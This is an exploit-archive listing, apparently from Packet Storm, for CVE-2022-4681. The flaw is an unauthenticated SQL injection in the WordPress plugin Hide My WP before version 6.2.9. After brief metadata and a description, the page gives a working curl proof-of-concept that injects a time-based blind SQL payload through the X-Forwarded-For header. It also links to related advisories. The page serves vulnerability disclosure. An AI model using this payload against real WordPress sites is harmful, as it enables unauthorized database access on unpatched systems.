Lucene search
Xenofon VassilakopoulosPACKETSTORM:177519HistoryMar 11, 2024 - 12:00 a.m.
WordPress Hide My WP SQL Injection
2024-03-1100:00:00
Xenofon Vassilakopoulos
packetstormsecurity.com
85
exploit
sql injection
wordpress
`# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)
## Description
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
## Proof of Concept
curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
`
Related
prion
prion
Sql injection
2023-02-06 20:15:00
nvd
nvd
CVE-2022-4681
2023-02-06 20:15:11
wpexploit
wpexploit
Hide My WP < 6.2.9 - Unauthenticated SQLi
2023-01-11 00:00:00
wpvulndb
wpvulndb
Hide My WP < 6.2.9 - Unauthenticated SQLi
2023-01-11 00:00:00
cve
cve
CVE-2022-4681
2023-02-06 20:15:11
cvelist
cvelist
CVE-2022-4681 Hide My WP < 6.2.9 - Unauthenticated SQLi
2023-02-06 19:59:20
zdt
zdt
WordPress Hide My WP < 6.2.9 - Unauthenticated SQL injection Vulnerability
2024-03-11 00:00:00
exploitdb
exploitdb
Hide My WP < 6.2.9 - Unauthenticated SQLi
2024-03-10 00:00:00